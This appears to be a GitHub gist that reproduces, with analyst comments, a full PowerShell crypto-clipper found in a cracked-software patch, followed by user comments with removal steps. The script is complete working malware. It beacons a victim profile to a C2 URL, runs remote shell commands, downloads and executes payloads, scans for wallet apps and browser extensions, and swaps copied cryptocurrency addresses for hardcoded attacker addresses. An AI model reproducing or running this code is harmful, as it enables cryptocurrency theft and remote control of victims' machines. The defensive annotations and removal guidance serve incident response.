This script was found in a malicious file that was not being detected by any AV, as reported by VirusTotal.
# Malware sample (PowerShell crypto-clipper / clipboard hijacker with a small C2 loop),
# reproduced here for defensive analysis only. Script-scope state used by the functions below.
$scriptItem = Get-Item -Path $MyInvocation.MyCommand.Path;  # handle to this script file; used by the SelfRemove command
# "Major.Minor" OS version string, compared against "6.1" (Windows 7 / Server 2008 R2) before TLS setup.
$OS_Major = [System.Environment]::OSVersion.Version.Major.ToString() + "." + [System.Environment]::OSVersion.Version.Minor.ToString();
$EndPointURL = "http://api.private-chatting.com/connect";  # C2 endpoint (network IoC); plain HTTP
$__Version__ = "M_37";  # variant tag, becomes the first field of the X-User-Agent profile string
# Random name for a named manual-reset event shared with the clipboard background job below.
# The event starts signalled; the C2 "worker" response header resets/sets it to pause/resume clipboard replacement.
[string]$WorkerEnHandle = [Guid]::NewGuid().ToString();
[System.Threading.EventWaitHandle]$WorkerEn = [System.Threading.EventWaitHandle]::new($true, [System.Threading.EventResetMode]::ManualReset, $WorkerEnHandle);
# Expands the environment variable named $str (wrapped in %...%).
# Unknown names are left as the literal "%name%" by ExpandEnvironmentVariables.
function XF3a8JO3r5r8G([string] $str) {
return [System.Environment]::ExpandEnvironmentVariables("%" + $str + "%")
}
# Returns property $value of the first instance of WMI class $class.
# If the class returns nothing, a fresh GUID is substituted, so the derived "HWID" is not
# stable on such hosts. Get-WmiObject calls are visible to WMI activity / script block logging.
function WMI([string] $class, [string] $value) {
$val = $null;
$results = (Get-WmiObject -Class $class) ;
foreach ($item in $results) {
$val = $item[$value];
break;  # only the first instance is used
}
if ($val -eq $null) {
$val = [Guid]::NewGuid().ToString();
}
return $val;
}
# Victim identifier: volume serial number of the first logical disk (see WMI fallback).
function Get-HWID() {
return (WMI 'win32_logicaldisk' "VolumeSerialNumber")
}
# OS caption (product name) for the profile string sent to the C2.
function ik9hXhN11R() {
return (WMI 'Win32_OperatingSystem' "Caption")
}
# Processor address width (32/64) for the profile string sent to the C2.
function P9TEtu77LCNtD() {
return (WMI 'Win32_Processor' "AddressWidth")
}
# Decodes the second byte of a SecurityCenter AntiVirusProduct.productState value into
# "Enabled" / "Disabled" / "Unknown". Only the listed byte values are recognised.
function av_enabled([uint32]$state) {
[byte[]] $bytes = [System.BitConverter]::GetBytes($state);
if (($bytes[1] -eq 0x10) -or ($bytes[1] -eq 0x11)) {
return "Enabled";
}
elseif (($bytes[1] -eq 0x00) -or ($bytes[1] -eq 0x01) -or ($bytes[1] -eq 0x20) -or ($bytes[1] -eq 0x21)) {
return "Disabled";
}
return "Unknown";
}
# Enumerates installed antivirus products from both SecurityCenter namespaces and returns
# "Name [Enabled|Disabled|Unknown], ..." for the C2 profile. Defender note: these two WMI
# queries from a hidden powershell.exe are a usable detection signal.
function TmBvivf3Wwj8U7NzZh() {
$avs = Get-WmiObject -Namespace "root\SecurityCenter" -Class "AntiVirusProduct";
$avs += Get-WmiObject -Namespace "root\SecurityCenter2" -Class "AntiVirusProduct";
$avf = New-Object Collections.Generic.List[string];
foreach ($av in $avs) {
$enabled = (av_enabled $av.productState);
$avf.Add($av.displayName + " [$enabled]")
}
return [string]::Join(", ", $avf.ToArray())
}
# Normalises a profile field: removes every "/" and upper-cases the first character.
# Empty input yields "".
function vxUABGtfQ7B7([string]$str) {
if ($str.Length -eq 0) {
return "";
}
$str = $str.Replace("/", "");
return ($str.Substring(0, 1).ToUpper() + $str.Substring(1));
}
$_HWID_ = Get-HWID;  # computed once at load; reused by getUserAgent on every beacon
# Builds the backslash-separated victim profile:
#   <version>_<HWID>\<COMPUTERNAME>\<USERNAME>\<OS caption> [<bits>]\<AV list>\<base64 wallet-path list>\
# It is sent base64(UTF-16) in the X-User-Agent header. FindPaths is defined later in the file
# and is resolved at call time, so every beacon re-scans the wallet paths.
function getUserAgent {
return "$($__Version__)_$($_HWID_)\" + (vxUABGtfQ7B7 (XF3a8JO3r5r8G "COMPUTERNAME")) + '\' + (vxUABGtfQ7B7 (XF3a8JO3r5r8G "USERNAME")) + '\' + (vxUABGtfQ7B7 (ik9hXhN11R)) + " [" + (P9TEtu77LCNtD) + "]" + '\' + (vxUABGtfQ7B7 (TmBvivf3Wwj8U7NzZh)) + '\' + (FindPaths) + '\'
}
# C2 beacon. POSTs $data to $EndPointURL with the victim profile in X-User-Agent and an
# optional X-notify header, returns the response body (parsed by main as "<cmd>|V|<args>...").
# The "worker" response header controls the clipboard job: "0" resets the shared event
# (replacement paused), anything else sets it.
function oUjmVhxHJ4Qhrw($data, $notify) {
if ($OS_Major -ne "6.1") {
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
# Certificate validation disabled process-wide (endpoint is plain HTTP anyway).
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
}
$cli = New-Object System.Net.WebClient;
$useragent = getUserAgent;
$cli.Headers['X-User-Agent'] = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($useragent));
if ($notify) {
$cli.Headers['X-notify'] = $notify
}
$Response = $cli.UploadString($EndPointURL, $data);
$worker = $cli.ResponseHeaders["worker"];
if ($worker -eq "0") {
$WorkerEn.Reset() | Out-Null;
}
else {
$WorkerEn.Set() | Out-Null;
}
return $Response.ToString()
}
# Downloads $URL to $Filename with a spoofed Chrome User-Agent. Uses Invoke-WebRequest on
# everything except OS 6.1, where it falls back to WebClient. Certificate validation is
# disabled here as well. Nothing is verified about the downloaded content.
function DownloadFile([string]$URL, [string]$Filename) {
[string]$UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/599.99 (KHTML, like Gecko) Chrome/81.0.3999.199 Safari/599.99";
if ($OS_Major -ne "6.1") {
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true };
$ret = Invoke-WebRequest -Uri $URL -OutFile $Filename -UserAgent $UserAgent -Method 'GET'
}
else {
$cli = New-Object System.Net.WebClient;
$cli.Headers['User-Agent'] = $UserAgent;
$cli.DownloadFile($URL, $Filename);
}
}
# Thin wrapper around DownloadFile; the $wait argument is accepted but unused.
function yQM1ybBDSjEP($url, $path, $wait) {
DownloadFile $url $path
}
# "SelfRemove" handler: deletes the script file and optionally exits. $svauXHdYmXwV1whE is
# not a parameter; it is read from the caller's (main's) scope via PowerShell dynamic scoping.
function Gn4bSDMHKIxEE8UP7wZJ($quit) {
Remove-Item -Path $svauXHdYmXwV1whE;
if ($quit) {
exit(0);
}
}
# C2 polling loop (about once per second). Each iteration beacons with an empty body, splits
# the response on "|V|" and dispatches on the first field:
#   Cmd        -> runs field[1] via a hidden "cmd.exe /c"
#   DwnlExe    -> downloads field[1] to %temp%\field[2], then runs field[3]+path via hidden cmd.exe
#   SelfRemove -> deletes the script and exits
# then runs the window-title monitor. All errors are swallowed. $EwcQB8qBuCScs is unused.
# Defender note: hidden cmd.exe children of powershell.exe and writes to %temp% are the
# observable side effects of the two remote-execution commands.
function main {
$ZFKUuv2t12Af = "|V|";  # field separator in C2 responses
$AuVAfc591z0Yw = (XF3a8JO3r5r8G "temp") + '\';  # drop directory for DwnlExe
$svauXHdYmXwV1whE = $scriptItem.FullName;  # read by the SelfRemove handler
$aWOPoMdm8aLL89 = $scriptItem.Name;
$EwcQB8qBuCScs = "powershell.exe";
while ($true) {
try {
[string]$kk9XDcoU8Sfo692 = oUjmVhxHJ4Qhrw;  # beacon; $data and $notify are null here
[string[]] $sep = $ZFKUuv2t12Af;
$Fd1Jal88zKyxij = $kk9XDcoU8Sfo692.Split( $sep, [StringSplitOptions]::None);
$ivI0sA6txn5XPifq = $Fd1Jal88zKyxij[0];
$JkByjqH1xztsW2YUG = $Fd1Jal88zKyxij[1];
if ($ivI0sA6txn5XPifq -eq "Cmd") {
Start-Process -FilePath "cmd.exe" -WindowStyle "Hidden" -ArgumentList ("/c " + $JkByjqH1xztsW2YUG)
}
if ($ivI0sA6txn5XPifq -eq "DwnlExe") {
$path = $AuVAfc591z0Yw + $Fd1Jal88zKyxij[2];
$cmd = $Fd1Jal88zKyxij[3] + $path;
yQM1ybBDSjEP $Fd1Jal88zKyxij[1] $path $true;
Start-Sleep 1
Start-Process -FilePath "cmd.exe" -WindowStyle "Hidden" -ArgumentList ("/c " + $cmd)
}
if ($ivI0sA6txn5XPifq -eq "SelfRemove") {
Gn4bSDMHKIxEE8UP7wZJ $true
}
}
catch {}
try {
FindWindow
}
catch
{}
Start-Sleep 1
}
}
# Inventory of wallet applications and browser wallet extensions to look for. Each "root" is an
# environment-variable path; each target is reported to the C2 by "name" when root\path exists.
# The browser-extension roots are keyed by extension ID (Chrome, Brave, Edge). Several entries
# are duplicated across roots. Consumed by FindPaths; the here-string is literal (no expansion).
$pathdata =
@'
[
{
"root": "%appdata%",
"targets": [
{
"name": "Exodus-A",
"path": "Exodus"
},
{
"name": "Atomic-A",
"path": "Atomic Wallet"
},
{
"name": "Electrum-A",
"path": "Electrum"
},
{
"name": "Ledger-A",
"path": "Ledger Live"
},
{
"name": "Jaxx-A",
"path": "Jaxx Liberty"
},
{
"name": "com.liberty.jaxx-A",
"path": "com.liberty.jaxx"
},
{
"name": "Guarda-A",
"path": "Guarda"
},
{
"name": "Armory-A",
"path": "Armory"
},
{
"name": "DELTA-A",
"path": "DELTA"
},
{
"name": "TREZOR-A",
"path": "TREZOR Bridge"
},
{
"name": "Bitcoin-A",
"path": "Bitcoin"
},
{
"name": "binance-A",
"path": "binance"
}
]
},
{
"root": "%localappdata%",
"targets": [
{
"name": "Blockstream-A",
"path": "Blockstream Green"
},
{
"name": "Coinomi-A",
"path": "Coinomi"
},
{
"name": "Exodus-A",
"path": "exodus"
},
{
"name": "Docker-A",
"path": "Docker"
}
]
},
{
"root": "%localappdata%\\Google\\Chrome\\User Data\\Default\\Extensions",
"targets": [
{
"name": "Metamask-C",
"path": "nkbihfbeogaeaoehlefnkodbefgpgknn"
},
{
"name": "MEWcx-C",
"path": "nlbmnnijcnlegkjjpcfjclmcfggfefdm"
},
{
"name": "Coin98-C",
"path": "aeachknmefphepccionboohckonoeemg"
},
{
"name": "Binance-C",
"path": "fhbohimaelbohpjbbldcngcnapndodjp"
},
{
"name": "Jaxx-C",
"path": "cjelfplplebdjjenllpjcblmjkfcffne"
},
{
"name": "Coinbase-C",
"path": "hnfanknocfeofbddgcijnmhnfnkdnaad"
}
]
},
{
"root": "%ProgramFiles(x86)%",
"targets": [
{
"name": "Electrum-A",
"path": "Electrum"
}
]
},
{
"root": "%localappdata%\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Extensions",
"targets": [
{
"name": "Metamask-B",
"path": "nkbihfbeogaeaoehlefnkodbefgpgknn"
}
]
},
{
"root": "%localappdata%\\Microsoft\\Edge\\User Data\\Default\\Extensions",
"targets": [
{
"name": "Metamask-E",
"path": "ejbalbakoplchlghecdalmeeeajnimhm"
}
]
},
{
"root": "%localappdata%\\Programs",
"targets": [
{
"name": "atomic-A",
"path": "atomic"
},
{
"name": "TrezorSuite-A",
"path": "Trezor Suite"
}
]
},
{
"root": "%ProgramFiles%",
"targets": [
{
"name": "Binance-A",
"path": "Binance"
},
{
"name": "BitcoinCore-A",
"path": "Bitcoin"
},
{
"name": "LedgerLive-A",
"path": "Ledger Live"
}
]
},
{
"root": "%localappdata%\\Microsoft\\Edge\\User Data\\Default\\Extensions",
"targets": [
{
"name": "Metamask-E",
"path": "ejbalbakoplchlghecdalmeeeajnimhm"
},
{
"name": "Coinomi-E",
"path": "gmcoclageakkbkbbflppkbpjcbkcfedg"
}
]
},
{
"root": "%localappdata%\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Extensions",
"targets": [
{
"name": "Metamask-B",
"path": "nkbihfbeogaeaoehlefnkodbefgpgknn"
},
{
"name": "MEWcx-B",
"path": "nlbmnnijcnlegkjjpcfjclmcfggfefdm"
},
{
"name": "Coin98-B",
"path": "aeachknmefphepccionboohckonoeemg"
},
{
"name": "Binance-B",
"path": "fhbohimaelbohpjbbldcngcnapndodjp"
},
{
"name": "Jaxx-B",
"path": "cjelfplplebdjjenllpjcblmjkfcffne"
},
{
"name": "Coinbase-B",
"path": "hnfanknocfeofbddgcijnmhnfnkdnaad"
}
]
}
]
'@;
# Wallet reconnaissance. Reports "metamask-F" when a MetaMask .xpi is found under the Firefox
# profiles directory, then every $pathdata target whose root\path exists. Returns the names
# newline-joined and base64(UTF-8) encoded, for inclusion in the beacon profile. Only presence
# is reported; no wallet contents are read in this listing.
function FindPaths {
$a = ConvertFrom-Json $pathdata
$results = New-Object Collections.Generic.List[string];
try {
# Recursive, force (hidden) listing of .xpi files under all Firefox profiles.
$ba = Get-ChildItem -Path "$env:appdata\Mozilla\Firefox\Profiles\*.xpi" -Recurse -Force;
Foreach ($i in $ba) {
if ($i.Name -match "ebextension@metamask.io.xpi") {
try {
[string] $ss = "metamask-F"
$results.Add($ss)
}
catch {
Write-Host "error"  # only visible if the host has a console
}
}
}
}
catch {}
foreach ($entry in $a) {
$rootdir = [System.Environment]::ExpandEnvironmentVariables($entry.root);
foreach ($target in $entry.targets) {
if ((Test-Path -Path (Join-Path -Path $rootdir -ChildPath $target.path))) {
$results.Add($target.name)
}
}
}
$ret = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes([string]::Join("`n", $results)));
return $ret;
}
# Window-title monitor. Scans every process with a non-empty main window title for the
# exchange/finance keywords below and reports a hit ("newnewapp" + keyword[title]) through
# log_event. A marker file is used to avoid re-reporting the same keyword.
# Notes for analysts:
#  - "%SystemDrive%" is NOT expanded by PowerShell in these strings, so the marker path is
#    taken literally, relative to the process's current directory (confirm on a live sample).
#  - log_event is not defined anywhere in this listing; the call sits inside try/catch, and
#    the catch only rewrites the marker file, so failures here are silent.
#  - $logsend, $gtr and $datatowrite are assigned but never used.
function FindWindow {
$keywords = @('binance', 'coinbase', 'blockchain', 'voyager', 'blockfi', 'coindesk', 'etoro', 'kucoin', 'citi', 'paxful', 'paypal', 'huobi', 'poloniex', 'bittrex', 'kraken', 'bitfinex', 'bitstamp')
$windows = (Get-Process | Where-Object { $_.MainWindowTitle -ne "" } | Select-Object MainWindowTitle)
foreach ($wndobj in $windows) {
[string]$wnd = $wndobj.MainWindowTitle;
foreach ($keyword in $keywords) {
if ($wnd.ToLower().Contains($keyword.ToLower())) {
try {
$contentfile = [System.IO.File]::ReadAllText("%SystemDrive%\Users\Public\log.dat").ToLower().replace(' ', '');
$logsend = 'newnewapp' + ($keyword.ToLower() + "[" + $wnd.ToLower() + "]").ToLower().replace(' ', '');
if ( $contentfile -eq $keyword.ToLower().replace(' ', '') ) {
$gtr = "";  # same keyword as last time: nothing to report
}
else {
$datatowrite = ('newnewapp' + ($keyword.ToLower() + "[" + $wnd.ToLower() + "]")).ToLower().replace(' ', '');
[System.IO.File]::WriteAllText("%SystemDrive%\Users\Public\log.dat", $keyword.ToLower().replace(' ', '') );
log_event 'newnewapp' ($keyword.ToLower() + "[" + $wnd.ToLower() + "]");
}
}
catch {
# Marker file missing/unreadable (or log_event failed): (re)create the marker and move on.
[System.IO.File]::WriteAllText("%SystemDrive%\Users\Public\log.dat", $keyword.ToLower().replace(' ', '') );
}
}
}
}
}
# Clipboard hijacker, run as a background job so it survives the C2 loop's failures.
# Receives the C2 URL, the pre-built victim profile and the name of the shared pause/resume event.
# Overview of what the job does (details inline):
#   1. opens the named event created by the parent (or a private one if that fails);
#   2. compiles a small User32/Kernel32 P/Invoke wrapper (window class, clipboard listener,
#      global memory, clipboard read/write);
#   3. loads the attacker address book (regex per currency -> replacement address);
#   4. creates a hidden message-only window, registers it as a clipboard-format listener and
#      pumps messages; on every WM_CLIPBOARDUPDATE it rewrites matching wallet addresses and
#      reports the original one to the C2.
# Defender note: a powershell.exe that compiles an Add-Type wrapper for AddClipboardFormatListener
# and holds a message-only window is a strong behavioural indicator of this family.
$job1 = Start-Job -ArgumentList $EndPointURL, (getUserAgent), $WorkerEnHandle -ScriptBlock {
param (
[string]
$EndPointURL,
[string]
$UserAgent,
[string]
$WorkerEnHandle
)
# Attach to the parent's named event; fall back to a private, always-signalled event.
[System.Threading.EventWaitHandle]$WorkerEn = $null;
if ([System.Threading.EventWaitHandle]::TryOpenExisting($WorkerEnHandle, [ref]$WorkerEn) -eq $false) {
$WorkerEn = [System.Threading.EventWaitHandle]::new($true, [System.Threading.EventResetMode]::ManualReset);
}
[System.Environment]::CurrentDirectory = $PWD.Path;
#Add-Type -TypeDefinition ([System.IO.File]::ReadAllText('User32.cs'))
# Pick the 32- or 64-bit .NET Framework directory for the reference assemblies below.
$Framework_Arch = '';
if([System.IntPtr]::Size -eq 8)
{
$Framework_Arch = '64';
}
Add-Type -Path "$env:windir\Microsoft.NET\Framework$Framework_Arch\v4.0.30319\System.Runtime.dll";
Add-Type -Path "$env:windir\Microsoft.NET\Framework$Framework_Arch\v4.0.30319\System.Runtime.InteropServices.dll";
# In-memory compiled P/Invoke surface (user32/kernel32). Compiled at runtime, so the
# temporary csc.exe invocation and its artefacts are another observable side effect.
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
public static class User32
{
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern ushort RegisterClassEx(ref WNDCLASSEX lpwcx);
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern IntPtr CreateWindowEx(UInt32 dwExStyle, IntPtr lpClassName, string lpWindowName, UInt32 dwStyle,
Int32 x, Int32 y, Int32 nWidth, Int32 nHeight, IntPtr hWndParent, IntPtr hMenu, IntPtr hInstance, IntPtr lpParam);
[DllImport("user32.dll")]
public static extern int GetMessage(out MSG lpMsg, IntPtr hWnd, uint wMsgFilterMin, uint wMsgFilterMax);
[DllImport("user32.dll")]
public static extern bool TranslateMessage([In] ref MSG lpMsg);
[DllImport("user32.dll")]
public static extern IntPtr DispatchMessage([In] ref MSG lpmsg);
[DllImport("user32.dll", SetLastError = true)]
public static extern bool AddClipboardFormatListener(IntPtr hwnd);
[DllImport("user32.dll", SetLastError = true)]
public static extern bool RemoveClipboardFormatListener(IntPtr hwnd);
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct WNDCLASSEX
{
[MarshalAs(UnmanagedType.U4)]
public int cbSize;
[MarshalAs(UnmanagedType.U4)]
public int style;
public WNDPROC lpfnWndProc; // not WndProc
public int cbClsExtra;
public int cbWndExtra;
public IntPtr hInstance;
public IntPtr hIcon;
public IntPtr hCursor;
public IntPtr hbrBackground;
public string lpszMenuName;
public string lpszClassName;
public IntPtr hIconSm;
//Use this function to make a new one with cbSize already filled in.
//For example:
//var WndClss = WNDCLASSEX.Build()
public static WNDCLASSEX Build()
{
var nw = new WNDCLASSEX();
nw.cbSize = Marshal.SizeOf(typeof(WNDCLASSEX));
return nw;
}
}
[DllImport("user32.dll", SetLastError = true)]
public static extern IntPtr DefWindowProcW(IntPtr hWnd, UInt32 msg, UIntPtr wParam, IntPtr lParam);
[DllImport("user32.dll", SetLastError = true)]
public static extern bool OpenClipboard(IntPtr hWndNewOwner);
[DllImport("user32.dll")]
public static extern IntPtr GetClipboardData(uint uFormat);
[DllImport("user32.dll")]
public static extern IntPtr SetClipboardData(uint uFormat, IntPtr hMem);
[DllImport("user32.dll")]
public static extern bool EmptyClipboard();
[DllImport("kernel32.dll")]
public static extern IntPtr GlobalLock(IntPtr hMem);
[DllImport("kernel32.dll")]
public static extern bool GlobalUnlock(IntPtr hMem);
[DllImport("kernel32.dll")]
public static extern IntPtr GlobalAlloc(uint uFlags, UIntPtr dwBytes);
[DllImport("kernel32.dll")]
public static extern IntPtr GlobalFree(IntPtr hMem);
[DllImport("user32.dll", SetLastError = true)]
public static extern bool CloseClipboard();
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate IntPtr WNDPROC(IntPtr hWnd, uint msg, UIntPtr wParam, IntPtr lParam);
[StructLayout(LayoutKind.Sequential)]
public struct POINT
{
public int X;
public int Y;
}
[StructLayout(LayoutKind.Sequential)]
public struct MSG
{
public IntPtr hwnd;
public uint message;
public UIntPtr wParam;
public IntPtr lParam;
public uint time;
public POINT pt;
public uint lPrivate;
}
}
"@
# Attacker address book: "a" = replacement address (IoC), "r" = regex that identifies a
# victim address of that format, "c" = currency label used in the C2 report.
$address_book = ConvertFrom-Json @"
[
{
"a": "bc1qn6ype8u5kgj672mvsez9wz9wt9wk22tzd5vprp",
"r": "^bc1[a-z0-9]{39,59}$",
"c": "BTC"
},
{
"a": "1Pqkb4MZwKzgSNkaX32wMwg95D9NfW9vZX",
"r": "^1[a-km-zA-HJ-NP-Z1-9]{26,33}$",
"c": "BTC"
},
{
"a": "3JvBvRuBfYvB6MjzMornj9EQpxhq9W7vXP",
"r": "^3[a-km-zA-HJ-NP-Z1-9]{26,33}$",
"c": "BTC"
},
{
"a": "qq9yrhef7csy3yzgxgs0rvkvez440mk53gv8ulyu6a",
"r": "^((bitcoincash|bchreg|bchtest):)?(q|p)[a-z0-9]{41}$",
"c": "BCH"
},
{
"a": "bnb1vmwl54jxj9yvsgz33xtyuvqnurdjy2raqnttkq",
"r": "^(bnb)([a-z0-9]{39})$",
"c": "BNB"
},
{
"a": "0x884467182849bA788ba89300e176ebe11624C882",
"r": "^0x[a-fA-F0-9]{40}$",
"c": "ETH"
},
{
"a": "48qx1krgEGzdcSacbmZdioNwXxW6r43yFSJDKPWZb3wsK9pYhajHNyE5FujWo1NxVwEBvGebS7biW9mjMEWdMevqMGmDJ6x",
"r": "^[48][0-9AB][1-9A-HJ-NP-Za-km-z]{93}$",
"c": "XMR"
},
{
"a": "rH6dyKWNpcvFz6fQ4ohyDbevSxcxdxfSmz",
"r": "^r[rpshnaf39wBUDNEGHJKLM4PQRST7VWXYZ2bcdeCg65jkm8oFqi1tuvAxyz]{24,34}$",
"c": "XRP"
},
{
"a": "DDxhfK5wbJkRN25mAbBYk3ND4xLjiMRyNq",
"r": "^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$",
"c": "DOGE"
},
{
"a": "Xtwj8uGx77NYBUki1UCPvEhe4kHYi6yWng",
"r": "^X[1-9A-HJ-NP-Za-km-z]{33}$",
"c": "DASH"
}
]
"@;
# Writes $text to the clipboard as CF_UNICODETEXT (format 13) via a GMEM_MOVEABLE (0x0002)
# global block. The block is handed to the clipboard on success and freed only on failure.
function Set-Clip {
param (
[string]
$text
)
if ($text -eq $null) {
$text = "";
}
$text += [char]0;  # NUL terminator required for clipboard text
[byte[]]$textb = [System.Text.Encoding]::Unicode.GetBytes($text);
$hMem = [User32]::GlobalAlloc(0x0002, [UIntPtr]::new($textb.Length));
if ($hMem -ne 0) {
$tmp = [User32]::GlobalLock($hMem);
if ($tmp -ne 0) {
[System.Runtime.InteropServices.Marshal]::Copy($textb, 0, $tmp, $textb.Length) | Out-Null;
[User32]::GlobalUnlock($hMem) | Out-Null;
[User32]::OpenClipboard([System.IntPtr]::Zero) | Out-Null;
[User32]::EmptyClipboard() | Out-Null; ;
[User32]::SetClipboardData(13, $hMem) | Out-Null;
[User32]::CloseClipboard() | Out-Null;
return;
}
[User32]::GlobalFree($hMem) | Out-Null;
}
}
# Reads the current clipboard contents as CF_UNICODETEXT (format 13); $null if unavailable.
function Get-Clip {
[string]$text = $null;
if ([User32]::OpenClipboard([System.IntPtr]::Zero) -ne 0) {
$hMem = [User32]::GetClipboardData(13);
if ($hMem -ne 0) {
$tmp = [User32]::GlobalLock($hMem);
if ($tmp -ne 0) {
$text = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($hMem);
[User32]::GlobalUnlock($hMem) | Out-Null;
}
}
[User32]::CloseClipboard() | Out-Null;
}
return $text;
}
# Reports a swap to the C2: same headers as the parent's beacon, $log carried in X-notify,
# empty POST body. $UserAgent and $EndPointURL are the job parameters.
function Set-Log([string]$log) {
$cli = New-Object System.Net.WebClient;
$cli.Headers['X-User-Agent'] = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($UserAgent));
$cli.Headers['X-notify'] = $log;
$cli.UploadString($EndPointURL, '') | Out-Null;
}
# Core clipper logic, run on every clipboard change. Skips when the shared event is not
# signalled (C2 sent worker=0). Otherwise trims the clipboard text and, for every address-book
# entry whose regex matches and whose address is not already the attacker's, overwrites the
# clipboard and reports "<coin> - <victim address> - <attacker address>" to the C2.
function Handle_WM_CLIPBOARDUPDATE {
try {
if ($WorkerEn.WaitOne(0) -eq $false) {
return;
}
}
catch {
}
try {
[string]$text = Get-Clip;
if ([string]::IsNullOrEmpty($text)) {
return;
}
$text = $text.Trim();
foreach ($entry in $address_book) {
if (($text -ne $entry.a) -and ($text -match $entry.r)) {
Set-Clip $entry.a
Set-Log ($entry.c + " - " + $text + " - " + $entry.a)
}
}
}
catch {
}
}
# Window procedure: pass everything to the default handler. The delegate is declared as
# WNDPROC in the C# above; PowerShell type names resolve case-insensitively.
$wndProc = [User32+WndProc] {
param (
[IntPtr]
$hwnd,
[uint32]
$msg,
[System.UIntPtr]
$wParam,
[IntPtr]
$lParam
)
return [User32]::DefWindowProcW($hwnd, $msg, $wParam, $lParam);
}
# Register a window class with a random (GUID) name and create an invisible message-only
# window (hWndParent = -3, HWND_MESSAGE) so the process can receive clipboard notifications.
$wx = [User32+WNDCLASSEX]::Build();
$wx.lpfnWndProc = $wndProc;
$wx.hInstance = [IntPtr]::Zero;
$wx.lpszClassName = [Guid]::NewGuid().ToString();
[uint16]$atom = [User32]::RegisterClassEx([ref]$wx);
[IntPtr]$hwnd = [User32]::CreateWindowEx(0, [IntPtr]::new($atom), [Guid]::NewGuid().ToString(), 0, 0, 0, 0, 0, [IntPtr]::new(-3), [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero);
[User32]::AddClipboardFormatListener($hwnd) | Out-Null;
# Message pump; 0x031D is WM_CLIPBOARDUPDATE. Runs until GetMessage returns <= 0.
$msg = [User32+MSG]::new()
while ([User32]::GetMessage([ref]$msg, 0, 0, 0) -gt 0) {
if ($msg.message -eq 0x031D) {
Handle_WM_CLIPBOARDUPDATE;
}
[User32]::TranslateMessage([ref]$msg) | Out-Null;
[User32]::DispatchMessage([ref]$msg) | Out-Null;
}
[User32]::RemoveClipboardFormatListener($hwnd) | Out-Null;
}
# Keep the C2 loop alive forever: any exception escaping main is swallowed and main restarts.
# main itself only returns via exit(0) in the SelfRemove path.
while ($true) {
try {
main
}
catch {
}
}
@NextNext333

NextNext333 commented Apr 21, 2022

Hi there.

I'm pretty sure my PC is infected by this PowerShell script, probably after running the following alleged patch named Team-crackerfg - Activator:

Patch BackupTrans

Do you know @infernoboy how I can get rid of this crappy thing? It keeps running 2 powershell.exe processes at Windows startup that I kill as fast as I can every time I switch on my computer. Hopefully, the script isn't being able to send info outside my PC because my ESET Antivirus is set in interactive mode and whenever a new incoming or outgoing connection is detected, it prompts me whether I want to allow them or not.

So when I saw the target URL being http://api.private-chatting.com/connect, it seemed to me very suspicious and I blocked it. So I think I'm safe but I want to remove this malware completely, of course, something I haven't managed so far.

Digging into the Windows Event Viewer, I've seen that at startup some PowerShell events occur (I've also generated a .evtx file which I can attach if necessary):

[BTW, Detalles de ejecución de la canalización means Pipeline execution details]

Event Viewer 1
Event Viewer 1XML

Event Viewer 2
Event Viewer 2XML

Event Viewer 3
Event Viewer 3XML

Hope you can help me. Thank you in advance.

@infernoboy

infernoboy commented Apr 21, 2022

How to remove this malware

  1. Open Task Scheduler
  2. A task was created under Microsoft > Windows > NetService > Network that is spawning PowerShell
  3. You can safely delete the entire NetService folder as it was also created by the malware
  4. Delete a fake log file that it created where it hides the script: C:\Windows\logs\system-logs.txt
  5. It also replaces the contents of C:\Windows\System32\SyncAppvPublishingServer.vbs with its own version. A copy from a clean install of Windows 11 can be found here: https://gist.github.com/infernoboy/7cc1fe26e647dd08e6e63a201cb38e27

That should be all. As for the app you were patching to begin with, in my case it isn't doing anything harmful and runs just fine.

What the malware appears to do

It monitors your clipboard looking for a cryptocurrency address. Once it finds one, it replaces it with its own address in the hopes you do not notice when you paste it. You'd be sending crypto to the malware writer's address if you don't. It also pings a server with some computer identifying information and the original address you wanted to send to. It doesn't look like any personal data is transmitted. I believe that's all it does, so it's not the most harmful thing. The addresses that the malware uses have made over $3m USD!

@NextNext333

@jblube

jblube commented Apr 21, 2022

Thanks @infernoboy , for me it worked great.

Unfortunately, I couldn't find the application/crack responsible for this, even looking very deep.

@uselesslemma

uselesslemma commented Apr 21, 2022

@infernoboy saving my life here. I pasted a BTC address that I immediately recognized as not the one I copied. Opened my clipboard manager, and sure enough, a hidden Powershell process replaced the address I copied.

@jblube @NextNext333 : I found the alleged patch here. Uploaded by some PB user called MotasemBT. I'll upload those files soon.

@NextNext333

NextNext333 commented Apr 22, 2022

How to remove this malware

1. Open **Task Scheduler**

2. A task was created under **Microsoft > Windows > NetService > Network** that is spawning PowerShell

3. You can safely delete the entire **NetService** folder as it was also created by the malware

4. Delete a fake log file that it created where it hides the script: **C:\Windows\logs\system-logs.txt**

5. It also replaces the contents of **C:\Windows\System32\SyncAppvPublishingServer.vbs** with its own version. A copy from a clean install of Windows 11 can be found here: https://gist.github.com/infernoboy/7cc1fe26e647dd08e6e63a201cb38e27

OMG @infernoboy, brilliant, you are not a boy, YOU ARE THE MAN! Hahaha Thank you soooo much! No more powershell processes running in the background. 👏👏👏👏

Before my first message here, I was looking into the Task Scheduler as well, but I didn't find anything related to this malware, because, I know now, I was looking at the wrong place. I even downloaded Windows Autoruns.exe to check all the programs being executed at startup, but to no avail.

